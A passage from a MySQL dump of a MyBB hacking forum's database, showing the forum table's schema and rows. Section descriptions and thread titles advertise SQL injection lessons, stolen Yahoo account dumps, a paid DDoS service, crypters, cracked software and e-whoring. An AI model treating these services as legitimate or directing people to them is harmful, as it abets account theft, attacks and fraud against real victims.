'1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('841', '84', '21', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_forums`; CREATE TABLE `mybb_forums` ( `fid` smallint(5) unsigned NOT NULL AUTO_INCREMENT, `name` varchar(120) NOT NULL DEFAULT '', `description` text NOT NULL, `linkto` varchar(180) NOT NULL DEFAULT '', `type` char(1) NOT NULL DEFAULT '', `pid` smallint(5) unsigned NOT NULL DEFAULT '0', `parentlist` text NOT NULL, `disporder` smallint(5) unsigned NOT NULL DEFAULT '0', `active` int(1) NOT NULL DEFAULT '0', `open` int(1) NOT NULL DEFAULT '0', `threads` int(10) unsigned NOT NULL DEFAULT '0', `posts` int(10) unsigned NOT NULL DEFAULT '0', `lastpost` int(10) unsigned NOT NULL DEFAULT '0', `lastposter` varchar(120) NOT NULL DEFAULT '', `lastposteruid` int(10) unsigned NOT NULL DEFAULT '0', `lastposttid` int(10) NOT NULL DEFAULT '0', `lastpostsubject` varchar(120) NOT NULL DEFAULT '', `allowhtml` int(1) NOT NULL DEFAULT '0', `allowmycode` int(1) NOT NULL DEFAULT '0', `allowsmilies` int(1) NOT NULL DEFAULT '0', `allowimgcode` int(1) NOT NULL DEFAULT '0', `allowvideocode` int(1) NOT NULL DEFAULT '0', `allowpicons` int(1) NOT NULL DEFAULT '0', `allowtratings` int(1) NOT NULL DEFAULT '0', `status` int(4) NOT NULL DEFAULT '1', `usepostcounts` int(1) NOT NULL DEFAULT '0', `password` varchar(50) NOT NULL DEFAULT '', `showinjump` int(1) NOT NULL DEFAULT '0', `modposts` int(1) NOT NULL DEFAULT '0', `modthreads` int(1) NOT NULL DEFAULT '0', `mod_edit_posts` int(1) NOT NULL DEFAULT '0', `modattachments` int(1) NOT NULL DEFAULT '0', `style` smallint(5) unsigned NOT NULL DEFAULT '0', `overridestyle` int(1) NOT NULL DEFAULT '0', `rulestype` smallint(1) NOT NULL DEFAULT '0', `rulestitle` varchar(200) NOT NULL DEFAULT '', `rules` text NOT NULL, `unapprovedthreads` int(10) unsigned NOT NULL DEFAULT '0', `unapprovedposts` int(10) unsigned NOT NULL DEFAULT '0', `defaultdatecut` smallint(4) unsigned NOT NULL DEFAULT '0', `defaultsortby` varchar(10) NOT NULL DEFAULT '', `defaultsortorder` varchar(4) NOT NULL DEFAULT '', `ficon` varchar(120) NOT NULL DEFAULT 'shim.gif', `ForumsRequirements` int(4) NOT NULL, PRIMARY KEY (`fid`) ) ENGINE=MyISAM AUTO_INCREMENT=85 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_forums` WRITE; INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('1', 'General', '', '', 'c', '0', '1', '1', '1', '1', '0', '0', '0', '', '0', '0', '', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'shim.gif', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('2', 'Test', 'For staff to test new features. ', '', 'f', '5', '1,5,2', '1', '1', '1', '12', '34', '1350874777', 'NXK', '61', '1044', 'dkdadwa', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', '1339992224_tests.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('3', 'Announcements, Feedback, Bugs and Suggestions', 'This is the section where LH staff announce new rules, people can suggest new ideas, report bugs & issues and leave your feedback here.', '', 'f', '1', '1,3', '1', '1', '1', '80', '729', '1352823143', 'MinecraftGeek', '150', '1256', 'Recent Downtime and Forced to change password', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '1', 'Rules for this section', '1. Only Announcements by Mods and Staff are posted here, member announcements go in the Off Topic section. 2. You are allowed to post your feedbacks and report site bugs here. 3. We have a separate section for member and staff reports and suggestions.', '0', '0', '0', '', '', '1339992119_announcements.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('4', 'Introduction', 'New to LH? Introduce yourself to other members and get to know others. ', '', 'f', '1', '1,4', '2', '1', '1', '48', '347', '1352809844', 'mothered', '205', '1259', 'Centagon here!', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', '1339992017_Positive.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('5', 'Staff', 'Private forum for all staff discussions.', '', 'f', '1', '1,5', '3', '1', '1', '10', '47', '1352195911', 't3h jok3r', '1', '1173', 'Request for LH staff', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', '1339992183_client.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('6', 'Miscellaneous ', '', '', 'c', '0', '6', '2', '1', '1', '0', '0', '0', '', '0', '0', '', '0', '1', '1', '1', '1', '1', '1', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'shim.gif', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('7', 'Off Topic', 'All discussions non-relating hacking are allowed in this section. Trolling will not be tolerated.', '', 'f', '6', '6,7', '1', '1', '1', '103', '939', '1352785934', 'Centagon', '334', '1260', 'Post your setup!', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '2', 'Rules', '1. No trolling 2. No donation begging 3. This is not 4chan', '0', '0', '0', '', '', '1339992294_sofa.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('8', 'Music', 'Fan of Music? Discuss and post your favorite songs here. ', '', 'f', '6', '6,8', '6', '1', '1', '20', '135', '1351698117', 'Mac Miller', '302', '1140', 'Who likes OFWGKTA?', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', '1339992375_juk.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('9', 'Monetizing Techniques ', 'If you\'re looking for methods to make more money online this is your forum.', '', 'f', '6', '6,9', '5', '1', '1', '38', '223', '1352769433', 'iTzIpod', '82', '1118', '? ? ADFOC.US VIEWS ? FAST ?CHEAP ? ?', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', '1339992422_emblem-money.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('10', 'Blackhat', '', '', 'c', '0', '10', '3', '1', '1', '0', '0', '0', '', '0', '0', '', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'shim.gif', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('11', 'Help Desk', 'New to hacking? Need help? Post all your questions here. Read forum rules', '', 'f', '10', '10,11', '1', '1', '1', '13', '77', '1352625357', 'sirchamp', '53', '1144', 'What can you do with?', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '2', 'Rules', '1. This forum is for help only, not for tutorials. 2. Please be patient, you can not expect a reply as soon as you post your question.', '0', '0', '0', '', '', '1339992459_Help_Circle_Blue.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('12', 'Tutorials', 'This forum is for all hacking and setup tutorials and guides. Please share your tutorials here. ', '', 'f', '10', '10,12', '2', '1', '1', '43', '176', '1352526732', 'PiXEL^OG', '258', '1220', 'Big list Hacking tutorials with .txt', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', '1339992570_graduated.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('13', 'Website and Forum Hacking', 'SQL Injection is a common website and forum hacking technique used by many website hackers. Learn how to SQL Inject here. ', '', 'f', '10', '10,13', '3', '1', '1', '26', '90', '1352571980', 'Triple H', '4', '1222', '400,000 Hacked Yahoo Accounts Dumps', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', '1339992990_domain-names-px-png.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('14', 'Anonymity ', 'Discussions on staying Anonymous including Proxies and Virtual Private Networks (VPNs)', '', 'f', '10', '10,14', '4', '1', '1', '14', '55', '1352572115', 'Triple H', '4', '991', 'VPN Accounts With Guide :)', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'modem.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('15', 'Tools and Programs', 'Share your favorite blackhat tools and programs here. Read the forum rules. ', '', 'f', '10', '10,15', '6', '1', '1', '37', '187', '1352534038', 't3h jok3r', '1', '1209', 'WinRAR cracked', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '2', 'Rules', '1. Use the search button to see if the program is already posted or not. Updated versions are allowed. 2. Do not request programs here. 3. All programs must contain a virus scan, do NOT upload on virustotal.', '0', '0', '0', '', '', '1339992636_preferences-system-network.png', '5'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('16', 'Social Engineering and Human Manipulation', 'Social Engineering is the art of manipulating people into performing actions or divulging confidential information.', '', 'f', '10', '10,16', '9', '1', '1', '48', '217', '1352597515', 'iTzIpod', '82', '418', '[eBook][Special] iTzIpod\'s SEing Tutorial', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'guy_fawkes_mask.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('17', 'E-Whoring', 'Don\'t know what E-Whoring is? Find out here. **Caution: Adult content warning!', '', 'f', '16', '10,16,17', '1', '1', '1', '11', '41', '1352476992', 'moruzaks', '323', '1218', 'Camdecoy bitch available here', '0', '1', '1', '0', '0', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '1', 'Rules', '1. All packs should have at least 2 picture previews. 2. All previews must be censored. 3. No previews directing to other sites. 4. Img & video code has been disabled for this forum.', '0', '0', '0', '', '', 'n4d9577fda0944_small.jpg', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('18', 'AIM MSN IRC ICQ and IM Hacks', 'If you are into exploiting instant messaging systems then we have a perfect forum for you. Post here for AIM hacks and other IM exploits.', '', 'f', '10', '10,18', '10', '1', '1', '12', '42', '1352771602', 'CommandoModz', '306', '1211', 'Facebook Blaster Pro v10.0', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', '1339993091_aim.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('19', 'Junk', 'A section for all unwanted threads.', '', 'f', '1', '1,19', '5', '1', '1', '80', '330', '1352249456', 't3h jok3r', '1', '1120', '[Junk]HOW TO GET UNLIMITED SKYPE PREMIUM', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'trash_full.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('20', 'File Protection, Crypters, Cryptography etc ', 'For discussion on keys, ciphers, and algorithms often used to keep information secret. Encryption is the art of concealing data and code.', '', 'f', '10', '10,20', '7', '1', '1', '11', '44', '1352521603', 'Timmy', '5', '766', '[3/14] War - Crypter [ScanTime] by cris', '0', '1', '1', '1', '1', '1', '1', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'application-pgp-encrypted.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('21', 'Botnets and IRC Bots, Zombies', 'Botnets, IRC Bots, Zombies and DDoS discussion', '', 'f', '10', '10,21', '8', '1', '1', '16', '92', '1352518368', 'Triple H', '4', '398', '[Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$5/Hour]', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'intranet.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('22', 'Whitehat', '', '', 'c', '0', '22', '5', '1', '1', '0', '0', '0', '', '0', '0', '', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'shim.gif', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('23', 'White Hat Help', 'Need to secure your website? Have you infected yourself? This is the right section ', '', 'f', '22', '22,23', '1', '1', '1', '12', '50', '1351112848', 'R?????zo?', '62', '532', 'Think you have an infection? Click Here.', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'borsalino_blanc.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('24', 'Miscellaneous Computer Talk', 'Off topic computer discussions are to be held here. ', '', 'f', '22', '22,24', '2', '1', '1', '23', '99', '1351828953', 'mothered', '205', '1105', 'Windows 8 Officially released 26-10', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'preferences-system-login.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('25', 'Computer Protection and Security Breaches', 'Find out the latest security alerts and post your topics here related to computer protection. ', '', 'f', '22', '22,25', '3', '1', '1', '12', '45', '1352527686', 'spacefish36', '8', '1225', '[Serials] Malwarebytes Full keys Dump', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'kwikdisk.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, 